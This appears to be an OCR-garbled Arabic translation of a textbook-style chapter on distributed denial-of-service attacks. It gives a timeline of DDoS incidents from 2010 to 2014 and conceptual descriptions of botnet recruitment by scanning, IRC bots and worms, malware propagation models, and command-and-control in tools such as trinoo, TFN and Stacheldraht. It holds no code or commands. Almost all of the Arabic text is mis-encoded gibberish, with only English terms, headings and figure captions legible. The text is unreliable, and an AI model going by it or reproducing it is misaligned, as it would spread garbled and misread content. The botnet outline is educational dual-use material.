lJU^VI jlS ' J^lj^] jl s wUl djUV jll Jlft 3Jj^ Jja ^> UjUij] ^5 Aa <j| ^kjj 2010 j^j^ t^j£l (Stuxnet) ^ 
,4^a,t jll Jl (cyber-terrorism) J jj^V^ jV^ j .^^^1 f-^l j ^jj^^ ^W-^j^ J j*^^ 
2011 * 

iCjIcLl-oII jz^f ^Ja Low Orbit Ion Cannon (LOIC) si J ^ Ij^i^L jjI jj* 28 f J ^ ^ 
.4_iLj^j3l cjlclL^allj Jaiili tilli J Iaj CjVI^JI jjc- J Jl^cl l^Jj t^jJ uij£ <jV jj 1 nunjj J UjLi 4£jJa3l . "Kochind.com" 

^LJl <Jj]axJ j Cjl Ala ^1 jaII (J^J^V dljjjjVl J^ UJ'^ (3 ^ J JQ^ (J^ (j-* 4 JJ» ui dili DDoS J^ LOIC 

jUi ^ c# ^ Oj^j t^Jajl Jc Jaxj tPraetox Technologies i> 6 j^j^ 

2012 * 

IiLijIj (jjJ ^taJI jjjj (> — ^ lP 3 ^*-" ^jS^I djUi^ki] 4jiiA\ q\ S i^L&ll cIjLjV jll S i^L&ll dLV jll ^ diajjcl 

toj^VI £JjLoiVI J JtSj .^a J?£^ J U J"* ; ^ fitixjJa £1a^J! (jlj <J>J^ Jl V J^J ^^11 <jj^j1| A-njj Jc DDoS djLaaJfc J j^j 

Jj djjl CjLft^Jl £>,JA .DDoS ^ CS^ 4 ^ ^ <J^-^> L>* S^l^ll 4_lfLjxiVI 4-ilLall LlLaljaJjAJl (J-»*J Clll^l jjJJJ^ll ^isU Lo£ 

,4i jJjoi-a jjc. <CjjoJIj ^^aJl O^J cAjj£j1I j>» ^ jjll 11a jl jJ^> J ,^!>Iasl!I jx» Jc CjLaJjkll (JjJaju jl JJ^j 

CjU^a jja*1I J <L DDoS stal "itsoknoproblembro" <<^j <jUaj J < *uv^ .. i t £>^*» DDoS dljj 

jLj" l^jfl Uj ajSjj^V) ajILJI cjLauuj^JI ^kjjal ^ t^ilcVI jjj^iii feaj .ajSjj^V) t*3 jjjII cAj$U Jllj ojjjSII DDoS 

"itsoknoproblembro" ^1 ^ ^ J° ^^Jl J^xj J ^ixJJI ^jj^l j! <iJ15 ^b n ^l jjj ^W-j^j^ 
.ft^j^aJlj 4^j^3I aIloJI 4Jc^U3! Cjl^aJI ^ dj^Ij s^j^JI DDoS ^ ^ ^ < ^ Defense.Net u^j^ uj^ 

^jJa (DDoS) (j^^>^^ CliUi^A jl^ajjai! q\j <clia Jc dill j La S laJLdll CIjUV j31 J ^jJjjjaixi ^jc j-<^^ ^JJ^J^ J^J^ 

2013 A 

cjLo^JI )(jju>i<ft jjc. j .jj^ jlaixi Jj cJj^j DDoS ^ cJ^^ tAjjl^JI J el ujI aja 300 jj^" DDoS ^Li^A 

^> J jVl L-L-ojII J ^jjIjII J CjjUUj-> 300 (JJ^ t"lUm SJjUll 

aj^uj jii ^Jj^.^ pUSi J^^Ji lP 3 *^ ilm^jd "Amazon.com ujj^" ^ v^ . n* l >«j jl^l ^2013 jj^I^ 

"^jjdjl j£ ^3 j>» jUjjIj .6j3 jILg jjc. ^jl Jj JjJjuJJ ^ ajuJ Cj9 J*^* f ^ - taJJ ^jLi^.Vl ^ a laJ Cilia 4^3 

^ jxJ] <£ j^JI jl Jj jjAj ^ill j Error 503 g3UJI J^^ 

Uakj ^^joaJJjll ( . UjuJI (jj^J U^^^^ L_llcr| Jj . J^Lobd ^1 <J>.I jJ Vj cJ^-^ cJ-^ 6 UJ ^ J -0 C? 1 ^^ <-d.laJl ^j j-a 'AW^S 

^jj^^ioixJI ^la« ^ J-<ixI3 ^ j-^^ .u^^ J^ j - ^^ f c?^ ^ j j 'DDoS f 503 

t . ujoj jluij (jjjLil 4_ixijajj cjL^jjj^j ^1 J^ j n 1 flj 45 -Jl '^j^ ^ L ,J * J 6 ^>f^^ <jIj^ ^UjI 

2014 

'NTP Amplification ? JJ ^ j^JI ^ J jjj^I jaAI 11a iaii jjj t^ixjll j J jajII J DDoS j^ 1 ^ 
U ^^LkJ I^Loj jjlj jSaj ijj jj^IVI ^1 jaJI dillii^j ^> j^c jjj £*aJ! .1 jUjj! jSSVl DA^S Reflection j 'SYN Flood 

.smokescreen 

Jl jo AjlftVl J jlai] 4£jj^3 jjjii ( flj^ d-ua .2014 J^t JJP jaI) "4-4±aJ| ^ L)^J^'" ^^JW 

diauJa jl j .2013 ^ s j^>Vl j^ <£j> j^Jl t (DDoS Attacks)^^ 1j >^> 3i jj^l t"4^^aJI ^> jUj^JI" cjU^a 

2013 ^ c> t^jJI cja^j Igil ^ jUj^JI" CjU^J ^ l gull J jLJ Sjfl jA\ i<£ijJi\ Prolexic 

djtajjJaj" q\ jJjaj* J 4<^jjoi3I dialjJalj .^Ld^Jl j-d jUij^Jl ClaLaaA *Li^. jlil 3 > <a1 ^ dlflJiiaJ jjc J^ cJ^^ *Utfljl! 6 j^J>.VI laJLujI 

Axl\ <!Hi3l Sjf^Vl j^ <^J> j^ll "^^Jl c> jUj^Jl" CjU^A AjI jjj jl Prolexic jj j JUI J cijj j^J( jIj^I JJ 

cIjLi^A jjI jj JJ 4^jjoJI CjjLailj .IjjixJ JJ^I a^jI ^ (J*^- J 6<jj^ljl3l ;CjIa^JI <illj* J ^Jlajll 6j^j>.VI ^Ijj^JjojI jcLoij jlj t^jL^Jl 

^> <jo jjII tSllS CjjIjjI ^^jJaUJI ^UJI j^ Jala jll ^jl! J!^lk jl d-ua t2013 ^ c^Wj "<-«^JI jUj^JI" 
^alc (j* jj^-^ 4-*^ <Jjl cJ^-^- Iaa^j Jll djL^gJ! (j* AjUJU 87 u^j '^^l J ciujl aaa 2.64 diiL <La,iaJI (j* (jLa^aJI 

."(Jj^Jjlj Jj^jl" ^ AIjLoJ <jojIj^ L-jjoiai tilli j 66,1^.1 J <C.Lal (j-G Cj^JjojI 2013 

jixj cillij <"Bitstamp ^^V' jj* '"Bitcoin ul£V' ^ jll 4^*^ J cijUL^ *135121 cia jj 42104 jj! 12 

Jjtjj CjU^jjJ (_£^j <^J ^''L^llaalij" ClilUij ."DDoS ^ * ^ ^ (jx» (jLa^aJl" _J ^^XJ La Cjl ^^-j ^ (J^-^Jl ^aUaill (jla^su 

<j^aLaJ) \ glhq^ a <Jj3 (j-a "Al±u\ \\a JJC- ^ullj" -1L 1 ^> j La ^ ja. j L_flLuu£l Asu 1 Jc L_LauaJl Clia jl Igil 6^31x11 <J ja. "^jJjSJuj" 

ttgJ IjLa UiiS jLoj (j* AaJJ jll "t ^Ujoluj" ^)flsu j .<Ld,laJl (j-a ^jLo^p* CjLaaJb Aj (^ill J-<^ J <1asl!Ij 
Axj <^H^j cA-LJal all A Llflll (»LVI (JjjJaC- ^9 "(jjjSklij" (j-a Lg-j^LaC L-lauuj I fll flit J ^a jfli ;"(jij£kiij" 4_LaC (Jjl^il 4_j^^)jj 

.t^ja^Vl ^ L-LauuJi CjULc; 44jjLLII "Mt. GOX 



^lab "^jijSjii" L-L^juj 4_iLaC ^jLu ^JJjuj <il "til jj> njV ala.VI (Jj^al jill £3 ^ (3^^ 4_j^aLaJl 1 ^*^Q^ - ^ is^ 0 " L 



<£jjoi Ja£a JjIajj l^jl Vj t jjjJI jl jV j^ll c5^>^^^ Cj!>Iasl!Ij l^ljjlLa (j^-dj a^<^j aIgc ^jc ojUc "(jjj^jj" (j! j^ij 
^lill CjUUjI Jj^ SjIjJI cjUij^l l£ Shaftj 'Stacheldraht 'Tribe Flood Network <trinoo 



(^j94^ ^ M^) How Attacks Are Waged 10.4 



'DDoS ^j^-^ .6jUj>>ill sUa j IRC-based command j> l!^ jII/^JU-aII ajlu Loj ^l,^ nub t^Sli ^jjj ,<ajaiio <Ljiaj 

/ alia a L_fllAAl AjJa 4j3 l_j jC. j-<JI J^-^ J^ il J-o a^C- ^La^lg.*] I^I^JjujI 



(Recruitment Of The Agent Network) *5t*jM (> ***** 

trinoo tAij^ll DDoS ^ ^jVUJI J .lUISHj (automated) ^ J yi ji ^jj^ ^1 lA^j .f 

CjVI aja^j] (Scanning) (j^ail! ^\ i^LJ J^ jl t J^l^lU ^Jl <Ljiaj ^uIaslII ^^jV ^llij (scripts) ^ill jJI uj^^'".? 
<jjj .(Bagle-infected hosts J 'MyDoom 'Slammer ^ JliJI J^ u A^ O e ^ J 1 ^^ j <fj*^all 

alia a AlllL (jial JC-V taa»V l^l^ajjajl ^aJJ jll dj CjI£jjuj ^.UJ > st^W A U AjjJajl (JjlaJ 4_a.| (jl^J^ll (J^axJ ^al^luil ^ jl^ll (j-Q 

j^J J jj^a^xJ! dj jill I jh^^lj (jl J^jVl J^ ^-jli tSJ j^ll (jjiiLJaxJl ia^^J ^al lij .DDoS ^ J ^ 



https://www.facebook.com/tibea2004 
(FINDING VULNERABLE MACHINES) fav ^i ^ t ctf i <je jjkit



L_LtIa jj J 4ilj t^jlxJl ^.llaauj .(jjljlkVI A \ » "j t fl«jJa Jallj dlli ^1) CliV jUj* ^J^J* ^ g i£ aJ ^^jII CjWI Jc- jjJslU ^ll^J ^.l^ll 

(jjSJjJaxJl (j-a (jjj!>L<J! <C a ^> S.J j^. j-a 6.JA .jjAslII ;Ja^Jl £ jjoJ .t^jjtjA-a £ J^J *&^)^J J^J J 1 ^ CllVVI 

.dijjiiyi Jc 

cjLouoj^xJIj CjU^UJI J Ia£a Jlc c£^jj <jUaj djli cjVL^I ( j r iijjJaJI Jc jj^t ^ <DDoS 0* Jj^ J 

jg > oJ 1] IgjJa^xJ (j^-aJ l^-ji 6 *SU^ (J^J ^ ^ J^ O -0 ^ (J C5^~^ cJ UJ^ W^'J ^ J 

AjjUjI! jU^bU <c jjoJI JU]| l_jj jjjVI Cjli (DSL) ^ Jl ^ jl^l JaaJl J JA^ ^ S jj>V( 4-iJ*JJ! .o^V*^ ^ <> 
jl^J ^^ill (jjiLJa-all <C j<^ a ^ I^A £juj j ,j3 j ,L_u£-<Jl j <J^1a3! (j-a ( : ^ Jl <*->VIj^jI 1 1 ll^ J^)l<Jl ^l>laJLujVl j 

DDoS j J ( . iV>l I,ja j .DDoS cJ^ (j-o d qjh jiill aJIIg l_aI,jaI ^a j jI^jjuAj <J-g*j j j.<u.>.a^ <JL^j*l Ia jjs jj j <ikj 
^ j£ Iajjj jj (JjjLujI djli (jj^j> ^i^l Jc- ( . J ciijl£ CjI j^VI s^ja .DDoS ^ J jjjjtlll J! ^ill j ^jjLu^JI 
Aiftl ^llj ^Knight botj Kaiten ^cjVUII .Windows s^xJI J^ ^JUJI J Sj^Vl DDoS 

.(Cygwin portable library) ^ j^^ l u^^s^ ^1.^ unb <iaLouj qAjJ aJj^VI ^1 j^VI 

Jj ^j^Jl o^*-? J^jj ^W^^ scanning Jtill J£xi3l ^jjajj .scanning Sj^VI d^JI aA^c Jc; Jiaj 

.jtpll ^U^al J jL^j ^l^JI jli j*Vt jl£ lij .c j SUaJ! Jc^ jl£ lij U Ai^<J jUa^ll lJ^JI 

[Figure: recruitment by scanning. Attacker, stepping stones, exploited desktops (recruits); legend: command/control traffic, scan traffic]



^L,U ^l^all l^j^ ajj^j <jL^ ajI^II J Scanning 
. jl^l j "(blended threats) aLIilJI CjI^^II" t*Ui J^ .ajjISIs ciik^ j ^ jjjJ! ^^31 j 
J tdjU^kJI ^ ^jaxJI ja jj fj2S\ jj3I ^ j^-« jl <j^j3 ^Ijj ^jc ojUc; {blended threats) cIjI^j^jII 

daLiai j tcijlj jj <iaLauj jl a_l<JIsl!I a£jjoJI l_jIj jjjj jl 4-^j3^ djlij jjjj L -^^>*^ j ("rcbot" ^-<^ (j-o 4 Vi ui bot 

lA^iij j-dl jVI Jjuj^joJI .IRC J ^ Jjuj^juJI (J^asu Jl JajjJ 4(JJJ^a3I c fljjJa^ll Jc AjilaJi J cJaxJ 'l!^^*^^ 

Jjijj jl t(nCtblOCk) (jJjUc 4_Sj£ ^juj-dj ;^^Jjoia13 oUall JxjouJI diUjil ^Uacjj tlRC ftUS Jj (j^akjuj S jCJ JLd tdj jj ^Lx»lj^)J 

ajjUjII aJl& J^U> ^ t*Ui j 6 power tdjUa^jJt ^ J Netblock Scan ^^j ^ j . ji^JI ^^Jl t ^ j^a 
Jj 192.168.0.0 (> ^ JS Js ^ 192.168 cJ^- J^) jj^ ^ J jVl ^ jl 

^ j) botnet ^1^1^^ ^W^^ £^j ^jii tj j^i^niol l u j^ > ?n ^ J^ ^ ^ J j^ 1 ^ ^ .(192.168.255.255 

^jjflJjJaAll IgJ <Lajli3! Jj i *u>\\j c aL&li jbjlaib ^ajflJ ^.I^aII .(IRC J J^ 3 ^ J^^ lS^^ L>^ ^J^>^ <J-dl3^ ^* j^j Jll J fto^ L>^ 
j^-!l A£jjoi (Jj£ ujj o^lcj JIjIUj t^listjJall ^jjiljJa^Jl ^ja Aj^jV Q^JCj ^jJflJjJa-<Jl 5-VjA UjUIj c fll > >i1 ^cxil^)j3l (J^asu ^listjJall 
Jc) c . UjuJ ^jJal j cJ^^ J^JJ^-i ^^>^-AJ m QAXL^\ $ *\\\ Jj3 ^1 lS^*^ uW^ 1 ^^ (J^H J ^a^ill Jj£ J^f^ . J^^^^ 



Cj\£jj^3I tilt ^ "lJ^JI ajjxJI cAi^H" jjiiij ^ cjU^UJIj DSL JjS ^ 4£ jLuJI netblocks * J^51

. JS^I IRC bot scanning ^ .Ajk^ ^UjJI ^ ^ill <(Phatbot 



[Figure: recruitment through IRC bots. Attacker, stepping stone, IRC servers, bots, exploited desktop (recruit); legend: command/control traffic, scan traffic]

ciij y^i\ .{Internet worms) ^ ^ j* j u ji^^ .ipaJSl <j-a^i3l ^ ^. v^un y±\ jj 

cJ^) dj^joj jj^ll 3JjUui <Ljiaj cAiscjjall cAijjaxJI ^ j^nn ^jll j <JI ^c-J ^.L^L ^ j^j (Internet worms) 

^iltj ^exploitation (2) ^ ^ > ^ 1 cjVI d^all Scanning (1) ajjJ-J ^Uij t^J s^jJl .(I jjj&Yl 

L_ajUaj (j-<» (J^asu ^jjQ^*^ Jjjl^xJl jlfr^J) ^^Ic 4 L» ujJ ^aJJ J j£) payload (3) J ~^*^ diaJ CjVI £jJaJj CjVI (jljl^U 

^aUaj <jjj£-<» jl oj^lill ^k) s^jJ! <^joij ^^>^ uj-^ u^** (payload) ^ .l£^>^^ ^ £ ... 1 ^ ^5-^ ^ ^ 1 



[Figure: recruitment by an Internet worm. Attacker, stepping stone, exploited desktop (recruit) spreading to further desktops; legend: command/control traffic, scan traffic]



^^LaC lllaJil jld A))f ui 4_Ljaij <^A dljjljyi (jl^P .djliLJl ^aUaj J IgJ-LaaJ ^aJJ jll £Lx*l^)iJl (j-G 4_L»l£ <C a (jj^J ^ jl t^dlliLoJl

.6^ j^ll jL&ul JU1I JUJI ^jJajJj .^J^SJ DDoS ^IjSI (> I ^j^ll A] jxa. (>jJaJJ c*Uil <DDoS 

.<jja Sjp gljaluAj ^j^^att ^jjjUxi) jUaj (jtJjilt 

*<y*\ 4_JUij j^aU tL-it^AbU ( IPv4u^j^ ^I^jLujI <1U> J) IP <jt ^ dij 32 l£1 Jl j^».ll jLl^VI .UjI JJ^ 

Jl .0.0 jlj^l A 6 IPul Cy* cs-^j^l ^—yW 16 j> 8 j^-^ * ^1 j j ^ c - \p\ j j ^ iC * 6 j^-^I J^ u^j^*-^ (j^-^ Cy >u ^ 

.AaJj <«— ^J J tdjl^JjoJl (j-a <C a jl tS^aJj Cjl^ijuj ^a^il ^ . l^A (jl jixll (jUaj J .255.255 

^jJa* J-i> afllll j all J ^a j£j ^aJ (jAj 'Vl.lJC.Vl t a^l..^" jj| <£jjj| <Jj£ ^ SjJxj^a <LojUi ikL . (hitHst) ^ laVluJ J 

JJ^J (jC !>Liaa 4 (J^-^ J^*^ .(j-aVI J jl (jj-ojJa-all (JjSS (jl Jfl ^ jll (jJjUxlI (jUaj J JaL^j 

.^La^Vlm^ JJC. (jJjUc CjlSUaj (j^na^Al £jt_jJall difl jll 

(C jlaj jllj 4-SVI J (J? i nil L_aLa jc i— La y o^j^ll (jli t jlfraJI AJu^\ .lie .L-jl uaj<JI jl^aJl Je ja* jaII CjL* jLlaII ^l^aJLuAj 
^£1 jx» (jjjUc Jc 'J^ j'^J ^ij^lxi (J^^ 'J^l^ C-l^f^ (_5-^ .^aaill (jjjlic (jC Cll^JJj ( Jj - gal 9jll J CjVIj^jVI JaLaU 

.(^1 J^i) SSH t> Jl^VI cjI^j u^j^ ^j 1 ^ known_hosts '-^j <l 

4_ijl!ill AjjIj CIjVI (Jj^^ 4-ii> 4 a i nJ ^j! ^jiajjij _l^J jl j>i Ja^j jLaajl ( . UjudJ 4_j\JtAl <c jjoij Cjjjaajl ^jl^j^ll 

A q a/^j^^^W lJ^-g-^ ^ 6 U^^^^ L>^ .^^^A 3 ^ ^--^J^V^ ^11 *^ j^ll ^cjoij j <jLj^a1I oj^-VI 

Ullc. ^jl^J^ll (jl Jjjjujj ^tJjUll /o^j^ll jLaiijl ^l^ljl Asu Ai^JjaboJlj oAaxIaII CjLo^JI Ajj-oJl liiill iajjli (j\ CjVI (^^Jc j laJ \ c^ill 
j.<U.>.>iJ A3 c^djjijVl ^ j^. Jl jj V [CO(l€ R€(l) r ^ ^ o^Luillj (JJjl - ga^oJI ^iiLJa^ll tJUxJl J^f^ ^5^*) Ifri-llajj ^aJJ V 

lC f A L M JJC. ci^-V DDoS AjL^a^ll 6 j^VI c>asu 

(Breaking Into Vulnerable Machines) ^i^aJI Sj^aVI ^UjSI 

. jl^aJt "til!)\j>il" jUSuj liA L_S jjoj .^ll) J jj^a jll (J^-' (j* ^ (,5-^^ CjVVI J c <!■> > ^ <Jalj J^lxlajV ^I^aII 

*\ lalll djl^l^cj j) CjULJI jjj*j/c_flia./AiLu^j (j^j t J lalll (5jbVl J jj^a jll (Jj-^I^aII j3 jj t fl» - gaJt JaUj ^ ^^xJaxll ^JilUtll 

.^IjVI 

<-i*^aJI ialiS jSL* Sjjj ^ o-Uil J^l (> it (Exploits typically follow a vulnerability exploitation cycle).

J ^ ^ <L^)IaJ l^l!>lijjaj| i^^y^Jj g aII ^)jlj^ J *^^>*^ ^— flljau^l -1 

.£jujjI (jUaj Jc l^J^lstlajl J - 6^)jIa1I oiA 2* jLk L_flJtjJall Jalij ~2 

.cjIj^VI £>1a ^al^klajU (jj^jii [script kiddies) j^^j ^aJVI CjIj^I -3 

.l^jjiiaJ Jc (Jj^a^Jj olA L-kx-jJall Jalaj Jc ^Ljakll 1 gajll hj ~4 

# L_astjJall Jalaj Jc *LojlaJ! JjUJl J^^J ^j'^ Q ^ ^aJJ ^aJ (j-«J ~5 

^ i^luii ^Ui DDoS J^' CH 3 *^ DDoS J 1^!>UjjuAj a^I^qJI ^ jL jl ftAaJ j L_axjJall Jallj AJ^aJ ^aJJ jl ^ja^cj 

.(propagation vectors) jl^VI dj^iU 1^31 jUIj U U116 j .4ilxuJI CjVI (>» aj^xII Jl 6^1 jSI jj^j ^ djl^sull ^ ajaxII 

Cy* jj^kVI (jjiA^l^ll ^1<J tilli j . jlg-aJl ^al^jal Asu IgJ^UcLuAj ^IS (_^ill L_astjJall Jallj ^Jai > ^.I^aII ^ajL 6 ^jUakVI (j-« J 
^AiJ ^jLi ^.I^aII jli 6(jAauiH J Jjjlk-cJl jl^aJl Jj <1 jj^ j (Jjg > ull .cJ^ jll ^Jl Jc- 6 JaJjuoll Jc ^!>LiLajVI j <L Jail (jjaiL ^J jj^ jll 

(J^lk j^ ^J jj^ jll .backdoor ^^^^^^ I-^a ^<u.ujj .(j^« Jc- *^jl jll <JU^jVI jl ^ ^-<u.>.>ij (_^i3l ^l^U^JI ^I^jLujI 
. (JL^aul t . ilia (_^V ( ; u^Lujj L_a jjujj cl^jcljj^xi Jc jiiixi (_£^>aJ CjVI^. Jj '^jj^ jjj-* <Jajoj| jj ULi^.1 ^ o backdoor 

'(Mended threats) ^ jj^^ djl^j^ill (jiasu l ^U n . n Jll j tCjKj^ ^alll JjS j^ l^ic c ajiaall ^jj ^1 Jll c axjJall Jallj j-a 6^.1 j 
6^A JjuoII CjI L_JJ^)aJ <1 jLswa j JjuLoJI JjoiII CjI j-<i ^Lojla Jc ^ j^aJ (Exploit) O^ 3 *^ .<i;ixjJall JjJ-^ll ^ jA j 

t ■ UjoLjj 4_Laili3l <J jak^ll JjiauoaJ ^aUaj ^j^ ULia^l jjLsuj I^A .^a^VI jlj l^aJ j tojj^ld <LjaJ jl (brute-farce) A.a.£\\.*1\ S jlll 
^jjc. 4_IaJjau3! CjLaI^II (J^asu j! "^)juJI *LaK" £y jl ;(J jist-a (JjjjouJI L_jL (.f-^ JJ^>^ ^ ,>^J ^jfi UJ ^

(MALWARE PROPAGATION METHODS) j^! J> 

jl (central repository) isj^j* £^ j& ^ SjLiall ^1 jJI ciufd jUiajVl jIj^j jl j£ iUJV 

^ jl (FTP ^lS^^ cJ^f^ cs-^-) ^Aii*JI jiaixi ^ cjL^g^JI ^j^j ^i^-all ^jl !^-^l j '(cache) ^—^j-* 
£>i& ^ ^IaaII (caching model) £jS>JI oO*^ S^lj Sj^ j^xJI 11a ^Ij^Vl J j*Vn ^li c qj > >>^ J£j 



[Figure: central-source propagation. 1 - exploit, 2 - copy code from the central source, 3 - repeat; attacker, victim, next victims]



^ ~ ikiLujj <^^j shaft j trinoo L . j'v uj^t^ <s ^ .W-^ j]j ^ j<s * >i j <— ^O^j - ^ CjIco jiuixJI 

Jxi U£ jj j^ill 6j£li3 Jjl^ill Sj^i* ^a! W32/Leaves '2001 ^ ^ jVl ^LjVl ^ li* 

.gO* ^ jlo^l ^ .2003 W32/SoBig ^jJi 

^cjjajjj .4i^^UI CjVV ^ tij^^ c qj > >>^ <j| j^l lU^j ^l^Jl ^-u^ 6^-^^ 'pull j> 'back-chaining j& j 

.back-chaining c^^^ 
liA £jj (jjill .s^lj J^Ul^Vlj jU^VI forward propagation J 'push 'autonomous ^ 6, J^ 

citti ^ <^uaij ^1 j^j V^j ^^Jl ^j^i j^ii s ^Ij^VI ^ iSj^. (exploit) 6acA: chaining^ 



JjS (NOOP j*\J c> Al-iLi S'the buffer overflow" ^>J1 j JjW^ 6 C5^) 

.(autonomous propagation) 



[Figure: autonomous propagation. 1 - exploit and copy code, 2 - repeat; attacker, victim, next victims]




(Controlling The DDoS Agent Network) lhj^ ^ J 



'Tribe Flood Network (TFN) <trinoo J* ^ Uj Sja** ^jV gr*^ 1 j^V 1 ^ **** ^ ^

ojii— -II <> 400'000 ^jj U s j^S Phatbot .IRC L^J j\£ 

http://www.securityfocus.com/news/8573.



(DIRECT COMMANDS) Sj-A^l j-tjSfl 
j^l jVI jt-^a] (S^^ ^^j^l fO^g ^1 ^^jj c— ^lS^ j3I/^JU-a3I f.Lkj ^ j£i trinoo DDoS ^ 

<j^aj (j-a (JjSjj (jl <j£-<uJl j-gI jVl jll J] (Aili^xi j-al jl <C j<^ <^ ^Ia^ILuAj UL^I jj j^l jVI Jib ^ajflJ 6jj^J (_£ill j 6£tllx-all 

Qli SjiaAjudll Jj^a i^j^j ^)-aljVI cJ^ 2 ^ . L — ^ (J JUt ^ JUJ -^ **^) C5^~^ J' (J^aAc- (J^aj ;(^jJalj) jLuLa jjc. 

j& t^j l SjAjuj jl SjLJaSI ^c^l jJI Aiili Jl <J jll ^ uj^ CjIj^VI CjIj^S ^jc Sj£a ^ laau ^ji (j^j jllj CjL^JIslxJI 

otjuc Ai j*^ glU^ll Jc <jla I Aia. Jaxj ^£1 (.shaft 'Stacheldraht 'trinoo cjIj^I <*^Ij cjUJUJI J^l 
( . i^j *5l£ jll j tl^a ^lUxll IP jl jjc (j^jJaj as DDoS ^ .^-o^' J fUajlt Jj*j^j SjIc] axj J^ "U j ^^l£ jll 

C5 Ic ialiaJ) (j-Q ^JIslaII 4 laiaJ ^ill L_kLill ^ ^5l£ jll ^ Jalil^VI ^alj .^Insu Aic ^IU-aII JJJ^J ^J^flJ ^ilc 

jjj^ jl^a. ^1 gSljll ^) jlU^J! (authentication) <a^l^» jjSj V ^cjVUJI .DDoS Jj^ CjUjkx» 

'Stacheldraht 'TFN 'trinoo c> Cj^likjll m ^jl U^j^ ^j t^j^ ^^£j >aljVl Jl^jj 

DDoS ^-jIa^a diLi ojiajjaJI jl t-L ui Sll ^1 j ^^£jllj cjUJU^II ^ ^1 (jjlall I jj^ 3 ' mstream j 

^ j^-V DDoS C5 ic ojlajjoil] I jSjj^jj (jj^^l ^1 .IRC ^ A-j^Lo j S^Ujuj JjISj ^jj^j CjIcIa^. ^jjj Sj^j^ 

j^.! ui (J^J dJjuJj! S jjjuLa JJC- ^JLujj laajL (JJ^^l $ 4(JlL<J! (JjiJjuJ ^^^^C _^j^.Ij jl <LjiaJ ^ ^ a JJC- l^J] (J J^ J^i (jl 

j-dl jl jIAj^I ^31^^13 (j^-dJ J) .cilli cJ^jj *^lclj <JLujj3I <J jl^. (J^asu cJ^'^ (JJ^a (jC Ajoiij J^IslSI 11a ^^^ic 6j !n Jul 11 aj^ 

6 jjoJI t <1 /sK ^1 jaJLujI J ^JIslxJI Asu ^jc J jA-^a jl! 4_jLa^j eJ £i jll/glUJI ajL ^^lun ^1 DDoS £j! j^^ 

^jVI CjL^Jlst-xJI ,A£jjjauJI jIjjojVI ^Ia^jjuAj jjjjujjll jl jjuJI ( ** >1 J^lk j3I/^JIslxJI cjVIj^jI ^^<^ cJj^-^ u^v^j 

jllj CjL^JIjlxJI ^jjj ^jjjJ (j^3j 4£t]lx-<J!j ^\ $ A\ qi* sUS jjq-^ Stacheldraht c5^>^^ <«— ilj^l .^Jlx-<J3 4_loi£jl!I 

b Jill] <Lla tdiVl^Jl ^ 6djl^ j 1 g t yVi o^-^ cjLaJlx a\\ di^jj^l cciia jll jj^ ^ 
AiLjaJjoal £3 j^a (j*j (J^ jll AiLjalLuil £3 jx» (j>» 4_ijj>JI JJ^>*ll ^^>^- f £ ^ J ^J^J'"^ ^ a 1 ^ Jj U£^-^ UJ^ ''

Illustration of control traffic seen from site hosting agents [figure; legend: command/control traffic, victim DoS traffic]

Illustration of control traffic seen from site hosting a handler [figure: stepping stone and agents; legend: command/control traffic]



(INDIRECT COMMANDS) 

jll 3JT 4 jUa.Vl c> yij 4"ajj^!" jll h^i pj85 c^JUJI jV .(j^^ll £jLjLJI <j^j j^M CjVL^VI 
4iilli f^lc 6 jilc .l^L^U DDoS l-a^xjII (j^j Ajli ^j'qq^ &1I Jja ^ ill C5 ic (jiajill ^j^-aj t^cllsLxJI <jj& (jjj^i 1 soc- 

ial* ^ Wi?Vl ill Jj^al jSlI sUi I^jj ^ill ^iL J^) CjUiUi ^ siLAll CjI^VI ^ jj SjaSLaII CjVL^jVI JaUji CA£ 

j .^/^Vl jjh'lll (jl jic -li^J 1 g ^ 4<ia£iLJl (JjLojjII (jc (J^'kMl j djl£djudli ^gJxjuLo <Jj3 (j-a <1 jg > nj 1 g*lh^!>La (j£*J ^^ill j 4^(jlaxilc. 

6 j^l jlkA\ iat_L<JI i^iil^>* J^Lk (j* cilli j 4(JjLuj^)U ^Ja^ij c*1Ua (jfL ^1 jl C5 1^. ^lIU-aJI jl Jj£ jll CjUIac c g t *^ ^^ic Sj^ta 

11a nj jVI JjLujjII Jl ffimV "^jjj^U" ( J?J CjUJUJI j jll J£ t^LJI JL^jVI yi . jjkj^l 

^j^lkJI j AaJU.Jl <a jjLJI djUUI DDoS ^ ^y^j tjnn ^ill C5 luaVl J;£ jII/^IslJI jl£ 

^ til3i£ j 1<A*C Ji3 j^iJl diULJl ^ J l^J (jn^jVo&jj djljl^j^aj ^ ^jAxJI jll j ^lUxlt ^ TCP ^-iVl^ajV 

(jl Asu ^!^j AiLjal ^Ic ftj^lS (jj^J (jl (jC jJJ iiaLaUJ DDoS ^— (J^*^ u!^ 4^j^aJl d^A clA^ J 3 .'^ Jal ^ cJ^J^l^ 

a £ jajoiaII ^aJl ^Jbj 

(jialjC-V CjIj jill (j-a Jjtillj I jxli J 'IRC ^5^* ^J^*^ C-P 3 ^ J^J^ DDoS ^ J^^ (j-« ^Axll ILd 

>CJ Ajjj iJ^V X^al jia iKaiten hot ^ VIS* jl£ . L >a^i3lj DDoS IRC bots ^ 'l£ 

(j>» ^^Ic 6^jl jll CjVIj^J^I ^-<U>.>iJ iS^ 2^^^ (Jjxjaij (j-d V^ .POWCV bot jj^J (J^^-^^ll ^Uaj Aliil j^.1 (JUa 

J Ujj . j^I IRC c^' lSS* IRC ^ l?^ -^J^ jk ^W^^ j (r/i^ bot) DDoS j c> jla t^L^l^ll 
iLjjudj Slifl (Jjjia (j^ ^IIslJI jj^ c_ixl .siLSll cjI^VI (jl^j V DDoS ^jVU^jI jli - cjVI^jI SUSS IRC gSt 

(jl^AJ ^ixiil aJ\ iaijjJ L— Lia ;Cj jJ AjjJaljjal SUS (illiA (jj^J U» S^lc . Jj^>*ll ^*Kj ^ ^ a (jj^J U» Ullc. 4JRC 
SUS J Cj jj j j^-j • J ^>^ AJ .^SjJaJI t^&i Ujjili (jS^j 'IRC ^>jo <J^> tjiiill SUS .^S^all SUS Jl Cj jj jiaj ^j* .AJUll aS^aII SUa

^11 4 Jjt.uuII L-fllijj tl^judij i : 'uWi tDDoS f t^j-naill j-al jl Jo jjll jloxloil Jo (jjSj* Lgili tAJUJI ^jtajll 

(jS-aj V Sliall .(jj^kV! ^ g*^ ^ '^lUfc Jxillj j& ^jUJI .^nl j^ll Sjaxlo IRC jjo <Jj^I jill no ^jjL^l^ll S c*1Ua 

